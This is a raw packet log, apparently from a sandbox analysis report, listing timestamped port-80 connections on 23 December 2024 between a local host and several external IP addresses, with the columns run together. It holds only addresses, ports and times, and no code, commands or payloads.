                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138437986 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138456106 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138473988 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138550043 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258219004 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258492947 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.258685112 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330096006 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330238104 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.330336094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334281921 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334414005 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.334479094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342700005 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342757940 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.342823982 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350723982 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350763083 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.350827932 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359076977 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359186888 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.359244108 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367489100 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367533922 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.367594004 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375876904 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375922918 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.375997066 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384265900 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384398937 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.384455919 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392628908 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392685890 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.392743111 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401024103 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401135921 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.401194096 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409425974 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409507990 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.409568071 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522330046 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522442102 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.522505999 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524822950 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524892092 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.524949074 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.529834032 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.529938936 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.530002117 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.534851074 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.535051107 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.535108089 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539836884 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539936066 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.539992094 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544656992 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544759989 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.544815063 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.557671070 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.576196909 CET4976680192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:27.695986032 CET8049766192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611116886 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611129045 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611157894 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611171007 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.611202955 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781328917 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781451941 CET8049805209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781516075 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.995249987 CET4980580192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.015999079 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.135936022 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.136044979 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.144273996 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.263863087 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.360881090 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.360932112 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.361068964 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.363363028 CET4981180192.168.2.4209.74.79.40
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.483402967 CET8049811209.74.79.40192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:51.943233013 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.062951088 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.063040972 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.079603910 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.199156046 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.588933945 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623078108 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623152971 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623162031 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623250961 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.708475113 CET8049827202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.708543062 CET4982780192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.608516932 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.728281021 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.728419065 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.747037888 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.866746902 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.260634899 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288230896 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288280964 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288315058 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288331985 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.380611897 CET8049836202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.380680084 CET4983680192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.278979063 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.399087906 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.399370909 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.422233105 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542071104 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542114973 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542172909 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542202950 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542232037 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542267084 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542341948 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542376041 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.542428017 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:58.932562113 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.052788019 CET8049842202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.052877903 CET4984280192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:59.969162941 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.088838100 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.088954926 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.111288071 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.230952978 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789521933 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789597034 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789674044 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789711952 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789762974 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789799929 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789855003 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789855003 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789870024 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789908886 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789915085 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789948940 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789974928 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789988041 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.790038109 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.909727097 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.909939051 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.910190105 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.000837088 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.001070023 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.001163960 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.004992008 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.005109072 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.005194902 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.013360977 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016407967 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016484976 CET4985080192.168.2.4202.95.11.110
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:02.016505003 CET8049850202.95.11.110192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216130018 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:22.216176987 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180619001 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180682898 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180716991 CET8049903199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.180910110 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:23.588902950 CET4990380192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.607825994 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.727560043 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.727665901 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.735997915 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:24.855606079 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824857950 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.824978113 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825014114 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825097084 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.825135946 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.827716112 CET4990980192.168.2.4199.59.243.227
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:25.947458982 CET8049909199.59.243.227192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.410299063 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.530278921 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.530474901 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.542052031 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:31.662308931 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.057641983 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125607967 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125674963 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125696898 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.125742912 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.177464962 CET8049928192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:33.177520990 CET4992880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.076163054 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.195707083 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.195830107 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.208802938 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:34.328438044 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.713860035 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790000916 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790062904 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790158033 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.790205956 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.833592892 CET8049935192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:35.833663940 CET4993580192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.732290983 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.852114916 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.852206945 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.865643978 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985507011 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985552073 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985609055 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985640049 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985690117 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985728979 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985779047 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985831022 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:36.985862970 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.370315075 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.490468979 CET8049942192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:38.490565062 CET4994280192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.389902115 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.509542942 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.509639025 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.518012047 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:39.637481928 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161214113 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161362886 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161401987 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161441088 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161465883 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161493063 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161495924 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161534071 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161567926 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161578894 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161606073 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161640882 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161649942 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161679029 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161720037 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281788111 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281845093 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.282023907 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.285612106 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.338818073 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383244991 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383423090 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.383526087 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.387306929 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388581991 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388623953 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.388659000 CET4994880192.168.2.4192.186.58.31
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.960005999 CET8049948192.186.58.31192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.581681967 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.701543093 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.701903105 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.714456081 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:47.834781885 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.229652882 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.393665075 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.807540894 CET8049969103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:49.807645082 CET4996980192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.247828007 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.368062019 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.369371891 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.382694006 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:50.502875090 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:51.885890007 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.049572945 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.480031967 CET8049974103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.480210066 CET4997480192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:52.904469013 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.024359941 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.024568081 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.038630009 CET4998080192.168.2.4103.106.67.112
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158819914 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158868074 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158900976 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.158930063 CET8049980103.106.67.112192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:53.159017086 CET8049980103.106.67.112192.168.2.4
